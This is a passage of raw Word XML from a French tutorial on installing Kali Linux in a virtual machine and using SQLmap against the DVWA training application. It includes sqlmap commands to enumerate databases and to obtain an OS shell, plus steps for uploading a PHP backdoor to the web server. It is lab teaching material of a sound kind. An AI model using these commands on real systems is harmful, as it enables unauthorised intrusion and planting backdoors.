          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kali Linux va maintenant vous demander d'entrer un mot de passe pour l'utilisateur root. Assurez-vous que vous pouvez facilement vous rappelez ce mot de passe, si vous l'oubliez, vous devrez réinstaller Kali Linux. Cliquez sur continuer après que vous avez entré et ré-entré le mot de passe de votre choix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B6138" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="006090"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Etape 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D6F20" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ici, sélectionner l'option "Assisté - utiliser un disque entier" et cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez sur continuer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCC091" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20345F62" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143C01F4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D23AED4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BABA891" wp14:editId="536E8955">
            <wp:extent cx="5760720" cy="3753485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3753485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6D5E7"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6478E56B" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06264C" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t>Ensuite sélectionner la première option "Tout dans une seule partition ". Cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez encore sur continuer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF7DEB7" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Etape 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327F9A9" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t>Dernière question! Confirmez que vous voulez vraiment faire ces changements en sélectionnant l'option Oui et en cliquant sur Continuer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA18071"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="529766BB" wp14:editId="154D0082">
            <wp:extent cx="4437611" cy="2792095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>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10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4443301" cy="2795675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C943CC"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213AAD4C"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6316FB53" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>L'installation de Kali linux va maintenant commencer. En moyenne, l'installation prend 30 min.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B49146" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Après quelques minutes, l'installateur vous demandera si vous souhaitez installer le chargeur de démarrage GRUB. Cliquez sur Oui et continuer. Enfin sélectionner dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et cliquez sur continuer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135D00B" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t> Après le redémarrage, entrez le login (root) et le mot de passe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B16E1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="35298A42" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46193645" wp14:editId="5043D400">
            <wp:extent cx="5760720" cy="4013835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="20" name="Image 20" descr="Une image contenant texte, Appareils électroniques, capture d’écran,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Appareils électroniques, capture d’écran, affichage&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4013835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9DB9F" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vous voilà avec Kali sur une machine virtuelle, prêts à tester vos réseaux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B2DD7"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34FA6B18" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB5755"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308202AA" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve"> est un outil open source de test d'injection SQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>Structured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>Query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve">) développé en Python. Il est conçu pour détecter et exploiter les vulnérabilités d'injection SQL dans les applications web. Les vulnérabilités d'injection SQL sont des failles de sécurité courantes dans les applications web, qui permettent à un attaquant d'exécuter du code malveillant sur le serveur de base de données. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve"> peut aider à identifier ces vulnérabilités et à exploiter leur potentiel. Il dispose également de fonctionnalités avancées pour la récupération de données et la prise de contrôle du système cible. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:t xml:space="preserve"> est un outil populaire dans la communauté de la sécurité informatique et est souvent utilisé par les professionnels de la sécurité pour tester la sécurité des applications web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD02BC" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="364EAB02" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5528E328" wp14:editId="1C9F6999">
            <wp:extent cx="5760720" cy="2976880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Image 22" descr="sqlmap - Wiki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qlmap - Wikida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976880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="030334DC" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0F9A30" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Extraction du nom de la base de données :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9AFB1B" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="36A01938" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilisez maintenant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour l’injection SQL et exécutez la commande suivante pour énumérer le nom de la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F44E17" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55648C8A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        <w:spacing w:before="75" w:after="195"/>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap -r file --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D706F37" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="2D6745BB" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:t>Ici, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>l’option –r </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:t>permet d’analyser la requête HTTP à partir de « fichier » et, comme vous pouvez l’observer, elle doit vider </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:t> comme nom de base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEAEBFA" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00425654" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686BB5E0"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072D4D7C"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7002523B"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24198684"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024A2AC8"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA2D3EC" wp14:editId="43A8C732">
            <wp:extent cx="5760720" cy="7583805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190880012"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0012" name="Image 1" descr="Une image contenant texte&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="7583805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257F04D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="800000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AABC47" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="5B05B566" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="003B514F" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="050D0072" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Apparition de l’os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6C897" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="70DA2504" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:t>Maintenant, tapez la commande suivante pour exécuter sqlmap afin d’accéder à os-shell du serveur Web (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F762E">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F762E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCAF453" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        <w:spacing w:before="75" w:after="195"/>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r file -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C0751" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Il essaiera de générer une porte dérobée; si vous souhaitez télécharger une porte dérobée PHP à l’intérieur du serveur Web, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tapez 4</w:t>
      </w:r>
      <w:r>
        <w:t> pour la charge utile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C818F4F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="21639E38" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CEEA76D" wp14:editId="2A99C768">
            <wp:extent cx="5760720" cy="5998210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="843780239"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80239" name="Image 1" descr="Une image contenant texte&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5998210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B99FFE"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3D3B77FD" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D76FEE7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tapez 4 </w:t>
      </w:r>
      <w:r>
        <w:t>pour la recherche par force brute à utiliser comme répertoire accessible en écriture pour le télécharger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D9D2A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
